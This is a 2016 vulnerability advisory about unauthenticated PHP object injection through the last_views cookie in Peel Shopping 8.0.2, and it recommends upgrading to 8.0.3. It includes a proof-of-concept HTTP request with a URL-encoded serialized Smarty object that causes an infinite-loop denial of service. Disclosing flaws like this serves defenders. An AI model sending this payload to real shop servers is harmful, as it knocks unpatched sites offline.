Peel Shopping 8.0.2: Object Injection

Date: 2016-09-15 15:51:52

1. Introduction

2. Overview

Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is vulnerable to Object Injection.

Peel Shopping stores a PHP object in a cookie, which is then unserialized when received by the application. An attacker can send arbitrary PHP objects, and has thus a limited influence on the control flow of the application. This can for example lead to DOS attacks by creating an infinite loop.

3. Details

The last_views cookie is passed to unserialize, leading to Object Injection. Authentication is not required.

The impact of the vulnerability is difficult to estimate, as it may increase with the existence of further modules. Without any modules installed, it can at a minimum lead to DOS.

Proof of Concept:

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Cookie: last_views=[INJECTED_OBJECT];

DOS Example: The Smarty_Internal_Configfileparser class can be used to create an infinite loop.

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Cookie: last_views=%4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d; Connection: close (Payload URL decoded: O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1;s:11:"yyTokenName";a:0:{}})

4. Solution

To mitigate this issue please upgrade at least to version 8.0.3

Please note that a newer version might already be available.

5. Report Timeline